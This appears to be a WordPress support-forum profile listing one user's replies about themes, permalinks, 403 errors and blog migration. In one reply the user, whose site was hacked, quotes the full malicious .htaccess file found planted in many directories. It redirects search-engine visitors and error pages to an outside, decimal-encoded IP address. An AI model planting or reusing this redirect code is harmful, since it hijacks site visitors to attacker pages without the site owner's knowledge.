alyas2022
Forum Replies Created
-
Forum: Plugins
In reply to: weird redirection whene i click a photoin fact, yes it was hacked, and i don’t know either how they did it, but i found plenty of .htaccess files in different directories that contains
RewriteEngine On Options +FollowSymlinks RewriteBase / RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* RewriteRule ^(.*)$ http://1502998896/~delgado/ [R=301,L] ErrorDocument 401 http://1502998896/~delgado/ ErrorDocument 403 http://1502998896/~delgado/ ErrorDocument 404 http://1502998896/~delgado/ ErrorDocument 500 http://1502998896/~delgado/the last lines refere to the site i’ve been redirected to.
yes jdembowski, i was hidding my wp version… but apparently, id didn’t do much.
thanks guys for your timeForum: Plugins
In reply to: weird redirection whene i click a photothe source doesn’t containe anykind of outside url…
here is the page im talking about :
http://seductionbykamal.com/comment-exciter-une-femme-et-la-seduire/
Forum: Fixing WordPress
In reply to: No cats, no links on my blogI don’t think so, because evene with different themes (with no editing, just widgets) the probleme still the same…
Forum: Your WordPress
In reply to: how to know who is loged in ?In others words, if there is a function that return all users logged in the blog…
Forum: Themes and Templates
In reply to: Site won’t work on IE7Thank you Whooami for your time .
It is fixed, so thanks again for the astuceForum: Themes and Templates
In reply to: Need help: Themes not displaying correctly…I just visited your blog and I don’t think the css is missing… Actually I think it’s good ! some parts are missing, maybe you can double check the names of your files to see if it correspond the those mentionned on the css…
Not to forget to mention that some themes won’t work great with an empty blog, maybe you should add some content and see what could happend then…
Forum: Themes and Templates
In reply to: Get a list page without the word ” Page”well I think I found the solution, i’ll post it so if anyone need it…
I just added the parametre ‘title_li‘ and I didn’t give anything to displaye…
<?php wp_list_pages('title_li=');?>And now Im wondering how to get ride of that black dots before each page.. those dots which caracterise a list …
Forum: Fixing WordPress
In reply to: “erreur 403” when edit commentsThey always have been the same (the two adresses)…
I’m wondring why it is just in the “edit comments” template..
any other idea ?Forum: Fixing WordPress
In reply to: “erreur 403” when edit commentsno idea ?
Forum: Installing WordPress
In reply to: moving from wordpress .com to a new serverthat’s what I found :
Q: How to I map my wordpress.com blog to a subdirectory of my current domain such as http://domain.com/blog ?
A: I’m sorry, but subdirectory mapping is not available. You could map to a subdomain as described below.I think it’s not available..
Forum: Installing WordPress
In reply to: moving from wordpress .com to a new serveryes, I already know about that…
What I’m looking for is to keep the old blog online for a while so it can redirecte users to the new one, you do that by replacing the 2 urls in “settings==>general” by the new ones and exporting the DB to import it on the new blog…But on myblog.wordpress.com I can’t find this feature, you can’t change the URL of your blog..
Hop I’m clear by now
Forum: Fixing WordPress
In reply to: import juste some tables from the DBplease !
Forum: Fixing WordPress
In reply to: XML to SQL (import failed)Or install Xampp on your local machine, install WordPress on your local machine, import the XML then export the MySQL database.
this is brilliant !
why didn’t I think about it !!
thx for your timeForum: Fixing WordPress
In reply to: “Not Found” after upgrading to 2.3.1Well I found that the permalinks structure was different than the one I used to use, so I changed it and now it’s fine !
Forum: Fixing WordPress
In reply to: “Not Found” after upgrading to 2.3.1When after replacing my old files with the new one I typed ../wp-admin/upgrade.php I had a message telling me that my DB is up to date and dosn’t need to be upgrade it ! could it be the probleme ?